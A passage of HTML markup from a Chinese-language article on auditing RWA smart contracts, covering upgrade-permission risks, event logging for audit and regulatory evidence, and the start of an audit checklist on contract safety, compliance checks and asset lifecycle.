0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">确认升级粒度</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">锁死初始化与管理员入口</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">升级前后状态兼容</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">审计时，升级相关的风险常常被低估：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">仅仅因为“现在实现是安全的”，并不代表未来升级后还是安全的；</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">许多“逻辑没问题”的协议，其实是被一个薄弱的升级权限“毁掉”的。</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">因此，审计中除了检查实现本身，还应对升级机制给出结论：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">谁拥有升级权？是否有多签 / Timelock？</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">升级是否有透明流程（提案、投票、延迟期）？</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">是否存在可以绕过升级流程、直接改实现的后门？</span></span></p></li></ul><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3.5 事件与日志：给未来的自己和监管留“证据链”</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在 RWA 场景下，事件(event) 不仅是方便前端和区块浏览器读取数据的工具，更是未来审计、取证、纠纷处理、监管汇报的证据基础。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对开发者来说，一条简单的经验是：所有对现实世界权利有影响的操作，都应该有事件。 例如：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">铸造、销毁、转账、冻结、解冻、强制转账；</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">白名单/黑名单状态变化、KYC 结果更新；</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">赎回请求创建、处理、完成、拒绝；</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">升级实施、参数变更、角色变更等。</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对审计人员来说，事件检查常被忽略，但在 RWA 项目中非常重要：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">看是否有关键路径没有任何事件记录——这意味着事后难以证明发生过什么；</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">看事件字段是否足够支撑还原关键业务行为；</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">看是否存在“通过私有函数绕过事件”的路径；</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">看是否按实际的业务需求进行事件记录——这是否会造成记录了“无中生有”的数据。</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">五、RWA 合约合规审计与安全披露清单</span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">I. 审计清单</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本章基于前述的技术分析，提炼并总结了一套通用的 RWA 智能合约全链路审计要点。</span></span></p><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">1、架构定性与预审计范围识别 </span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在深入代码细节前，必须先理清“链上代码”在“现实资产”中扮演的角色及法律边界。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">资产类型与监管定位</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">真实性来源</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">权限控制映射</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2、合约安全与算术完整性审计</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RWA 涉及高价值资产，基础的 Solidity 安全是底线。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">数值溢出与精度(Overflow &amp; Precision)</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">重入攻击防护(Reentrancy)</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">外部调用风险(External Calls)</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">初始化与存储</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3、身份认证与合规检验审计</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RWA 的核心特征是“许可制(Permissioned)”，每一笔交易都必须通过合规校验。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">合规钩子(Hooks) 全覆盖验证</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">身份注册表与隐私</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">黑白名单逻辑</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">4、资产全生命周期管理审计</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从发行到销毁，资产的状态流转必须严丝合缝，申购、持有、流转、注销逻辑符合现实世界的法律逻辑。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">发行与铸造(Issuance)</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">赎回机制(Redemption)</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, 